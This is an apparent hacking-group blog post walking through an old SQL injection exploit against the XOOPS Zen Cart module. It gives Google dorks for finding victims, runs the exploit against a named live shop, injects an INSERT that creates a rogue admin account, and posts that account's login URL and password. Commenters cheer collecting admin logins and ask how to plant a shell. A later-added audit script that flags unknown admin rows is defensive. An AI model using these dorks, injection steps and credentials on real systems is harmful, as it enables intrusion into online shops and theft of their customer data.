
Hack XOOPS Module Zen Cart

This is an old bug from BlackH >> http://milw0rm.com/exploits/9005
It works for Zen Cart version 1.3.8, and it works on the XOOPS Zen Cart module too.
Let's go.. :p

google dork

“powered by xoops” inurl:”modules/zox”
“powered by xoops” “zen cart”

Run the exploit from your shell

root@evilc0de:/home/noge# ./zen.py -url http://www.a-akinai.com/modules/zox
sql@jah$

Now try the show tables; command. If it succeeds, then we can exploit the target.

sql@jah$ show tables;
>> success ( show tables; )

The command executes successfully.. but you can't see the table list, right?
Let's add an admin user to the database with this SQL command..

sql@jah$ INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, 'giant', 'admin@localhost', '617ec22fbb8f201c366e9848c0eb6925:87');
>> success ( INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, 'giant', 'admin@localhost', '617ec22fbb8f201c366e9848c0eb6925:87'); )

Admin added successfully.. now try logging in to the admin panel..

http://www.a-akinai.com/modules/zox/admin/login.php
username : giant
password : wew

Article From: NoGe / evilc0de
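
From the defender's side, the account added above leaves a row in the admin table that a routine audit can catch. The following is an added example, not part of the original article or of Zen Cart: it uses an in-memory SQLite table as a stand-in for the shop's MySQL database, takes the column names from the INSERT above, and assumes a baseline of known admin accounts (BASELINE, build_sample_db and audit_admins are hypothetical names).

```python
import sqlite3

# Assumption: the admin accounts the shop owner knowingly created.
BASELINE = {(1, "shopadmin")}

def build_sample_db():
    """Constructed in-memory stand-in for the Zen Cart `admin` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admin (admin_id INTEGER PRIMARY KEY, admin_name TEXT,"
        " admin_email TEXT, admin_pass TEXT)"
    )
    conn.executemany(
        "INSERT INTO admin VALUES (?, ?, ?, ?)",
        [
            # Constructed legitimate account.
            (1, "shopadmin", "owner@shop.example", "constructed-hash:aa"),
            # Row with the values used in the walkthrough above.
            (55, "giant", "admin@localhost", "617ec22fbb8f201c366e9848c0eb6925:87"),
        ],
    )
    return conn

def audit_admins(conn, baseline=BASELINE):
    """Return [(admin_id, admin_name, [reasons])] for rows worth reviewing."""
    findings = []
    prev_id = 0
    query = "SELECT admin_id, admin_name, admin_email FROM admin ORDER BY admin_id"
    for admin_id, name, email in conn.execute(query):
        reasons = []
        if (admin_id, name) not in baseline:
            reasons.append("not in baseline")
        # Weak signal only: deleted accounts also leave gaps in the sequence.
        if admin_id - prev_id > 1:
            reasons.append("admin_id gap")
        if (email or "").lower().endswith("@localhost"):
            reasons.append("placeholder email")
        if reasons:
            findings.append((admin_id, name, reasons))
        prev_id = admin_id
    return findings

if __name__ == "__main__":
    for finding in audit_admins(build_sample_db()):
        print(finding)
```

Against a real shop the same query would run over the MySQL connection, with the baseline kept outside the database so a compromised application cannot rewrite it.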


3 comments

  1. Wow, lots of databases here.
    Nice, nice..

  2. Cart, cart again!
    Woohoo.. time to expand the admin login collection.
    Sweet!

  3. How do you install a shell on Zen Cart, bro?????
